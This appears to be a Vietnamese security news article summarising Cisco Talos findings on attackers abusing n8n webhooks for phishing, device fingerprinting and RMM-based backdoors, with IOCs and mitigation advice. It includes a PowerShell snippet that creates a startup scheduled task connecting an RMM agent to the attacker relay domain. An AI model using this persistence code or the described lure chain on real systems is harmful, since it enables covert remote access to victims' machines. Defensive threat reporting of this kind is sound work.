Trong một diễn biến mới của mối đe dọa mạng, các đối tượng tấn công mạng đã phát hiện và lạm dụng một cách thức mới để vượt qua các bộ lọc bảo mật truyền thống. Thay vì xây dựng cơ sở hạ tầng độc hại riêng, chúng đã biến công cụ tự động hóa quy trình làm việc AI hợp pháp là n8n thành một vũ khí, sử dụng nền tảng này để gửi email lừa đảo (phishing) và phân phối các tải trọng nguy hiểm trực tiếp đến thiết bị nạn nhân.
Khai thác nền tảng n8n trong các chiến dịch tấn công mạng
Hoạt động lạm dụng n8n được các nhà nghiên cứu quan sát thấy từ tháng 10 năm 2025 và tiếp diễn đến tháng 3 năm 2026. Trong giai đoạn này, những kẻ tấn công đã tạo các tài khoản nhà phát triển miễn phí trên nền tảng n8n. Các tài khoản này tự động cấp phát các subdomain dưới không gian tên *.app.n8n[.]cloud.
Do những subdomain này thuộc về một dịch vụ được công nhận rộng rãi, các email gửi đi và yêu cầu web có nguồn gốc từ chúng thường được nhiều cổng bảo mật doanh nghiệp coi là đáng tin cậy. Điều này cho phép kẻ tấn công định tuyến nội dung độc hại của chúng qua một kênh không dễ dàng bị các giải pháp bảo mật email phát hiện.
Các nhà nghiên cứu Sean Gallagher và Omid Mirzaei của Cisco Talos đã xác định sự lạm dụng nền tảng n8n. Họ đã công bố phân tích chi tiết về các chiến dịch này trên blog của Talos.
Bạn có thể tham khảo thêm chi tiết về phân tích của Cisco Talos tại blog.talosintelligence.com.
Phương thức lạm dụng Webhook và theo dõi thiết bị
Điểm khai thác chính trong các chiến dịch này là các webhook của n8n có thể truy cập qua URL. Đây là một tính năng tiêu chuẩn cho phép một ứng dụng gửi dữ liệu theo thời gian thực đến một ứng dụng khác. Tính linh hoạt và dễ tích hợp của n8n đã biến nó thành một công cụ lý tưởng cho phương pháp tấn công này, vì không cần cơ sở hạ tầng tiên tiến để triển khai hoạt động.
Nghiên cứu của Cisco Talos chỉ ra rằng khối lượng email chứa URL webhook của n8n trong tháng 3 năm 2026 cao hơn khoảng 68% so với tháng 1 năm 2025. Điều này cho thấy sự gia tăng rõ rệt và có chủ đích trong việc lạm dụng nền tảng này, tạo ra một mối đe dọa mạng đáng kể.
Các phát hiện đã làm rõ hai mục tiêu tấn công chính của mối đe dọa mạng này là:
- Phân phối mã độc.
- Thu thập dấu vân tay (fingerprinting) các thiết bị mục tiêu.
Bằng cách nhúng các pixel theo dõi vô hình (invisible tracking pixels) được lưu trữ trên các URL webhook của n8n vào các email HTML, kẻ tấn công có thể âm thầm thu thập thông tin thiết bị như loại trình duyệt và địa chỉ IP từ những người nhận chỉ cần mở email mà không cần nhấp vào bất kỳ liên kết nào.
Chi tiết các Chiến dịch Tấn công Phishing
Chiến dịch giả mạo Microsoft OneDrive và mã độc Datto RMM
Một trong những chiến dịch được ghi nhận rõ ràng nhất liên quan đến các email lừa đảo mạo danh thông báo chia sẻ thư mục Microsoft OneDrive. Khi người nhận nhấp vào liên kết webhook n8n được nhúng, trình duyệt của họ sẽ tải một trang HTML chứa thử thách CAPTCHA.
Bước này đóng vai trò như một cổng xác minh cơ bản, giúp kẻ tấn công lọc bỏ các công cụ quét tự động và môi trường sandbox. Sau khi CAPTCHA được giải, một nút tải xuống sẽ xuất hiện. Một tệp có tên DownloadedOneDriveDocument.exe được tải về một cách âm thầm từ một máy chủ bên ngoài.
Tuy nhiên, vì toàn bộ quá trình chạy trong JavaScript của tên miền n8n, quá trình tải xuống dường như đến từ chính cơ sở hạ tầng n8n đáng tin cậy. Khi được thực thi, tệp này sẽ cài đặt một phiên bản đã sửa đổi của công cụ Datto Remote Monitoring and Management (RMM), một ứng dụng quản trị từ xa hợp pháp.
Sau đó, mã độc này sử dụng các lệnh PowerShell để cấu hình Datto RMM như một tác vụ theo lịch (scheduled task). Điều này thiết lập một kết nối liên tục đến một máy chủ relay trên tên miền centrustage[.]net trước khi tự xóa và phần còn lại của tải trọng để che giấu dấu vết, thiết lập một mối đe dọa mạng dai dẳng trên hệ thống.
# Ví dụ lệnh PowerShell (giả định) để tạo Scheduled Task
$action = New-ScheduledTaskAction -Execute 'C:\Program Files\Datto\RMM\agent.exe' -Argument '-connect centrustage.net'
$trigger = New-ScheduledTaskTrigger -AtStartup
Register-ScheduledTask -TaskName "Datto RMM Persistent" -Action $action -Trigger $trigger -Description "Establishes persistent RMM connection."
Chiến dịch phân phối MSI độc hại và ITarian RMM
Một chiến dịch riêng biệt nhưng có liên quan khác đã sử dụng webhook của n8n để phân phối một tệp Microsoft Windows Installer (MSI) đã bị sửa đổi độc hại. Tệp MSI này sau đó cài đặt công cụ ITarian Endpoint Management RMM. Công cụ này hoạt động như một cửa hậu (backdoor) và chạy các module Python để lấy cắp dữ liệu từ hệ thống bị xâm nhập.
Trong khi đó, một thanh tiến trình cài đặt giả mạo được hiển thị để che giấu hoạt động thực tế. Cả hai chiến dịch đều dựa trên cùng một logic cốt lõi: dẫn dắt nạn nhân qua một tên miền đáng tin cậy, ngụy trang quá trình phân phối như một hoạt động bình thường, và cài đặt công cụ truy cập từ xa tồn tại âm thầm trên hệ thống bị tấn công mạng.
Các Chỉ số Thỏa hiệp (Indicators of Compromise – IOCs)
Để giúp các tổ chức phát hiện và ứng phó với mối đe dọa mạng này, các chỉ số thỏa hiệp sau đây đã được ghi nhận:
- Tên miền lạm dụng:
*.app.n8n[.]cloud(subdomain của nền tảng n8n bị lạm dụng) - Tên miền Command-and-Control (C2):
centrustage[.]net - Tên tệp độc hại:
DownloadedOneDriveDocument.exe(trong chiến dịch giả mạo OneDrive) - Các URL webhook có cấu trúc bất thường: Cần phân tích hành vi để nhận diện các dấu hiệu của mối đe dọa mạng.
Chiến lược Giảm thiểu Rủi ro và Phòng chống
Cisco Talos đã đưa ra một số bước mà các đội bảo mật nên thực hiện để giảm thiểu rủi ro từ loại tấn công mạng này. Việc hiểu rõ mối đe dọa mạng này là rất quan trọng. Thay vì chỉ chặn các tên miền tĩnh, vốn có thể làm gián đoạn các quy trình làm việc kinh doanh hợp pháp sử dụng nền t8n, cần áp dụng các biện pháp phòng thủ tiên tiến hơn.
Các nhà bảo vệ nên triển khai tính năng phát hiện hành vi (behavioral detection). Tính năng này sẽ kích hoạt cảnh báo khi có lưu lượng truy cập bất thường lớn hướng tới các tên miền nền tảng tự động hóa từ các nguồn nội bộ không mong muốn. Điều này giúp nhận diện sớm các hoạt động lạm dụng.
Đội ngũ bảo mật cũng cần gắn cờ (flag) bất kỳ endpoint nào đang cố gắng giao tiếp với các tên miền nền tảng tự động hóa AI nằm ngoài danh mục quy trình làm việc đã được tổ chức phê duyệt. Đây có thể là dấu hiệu của một sự xâm nhập đang diễn ra trong hệ thống bị xâm nhập.
Chia sẻ các chỉ số thỏa hiệp (IOCs), bao gồm cấu trúc URL webhook cụ thể, hash tệp độc hại và các tên miền Command-and-Control đã biết, thông qua các nền tảng như Cisco Talos Intelligence là một biện pháp thực tế khác để tăng cường khả năng phòng thủ cộng đồng.
Cuối cùng, các tổ chức nên triển khai các giải pháp bảo mật email dựa trên AI. Các giải pháp này sẽ phân tích các tín hiệu hành vi, không chỉ dựa vào điểm uy tín (reputation scores), để phát hiện các mã độc và mối đe dọa mạng di chuyển qua cơ sở hạ tầng được coi là đáng tin cậy.
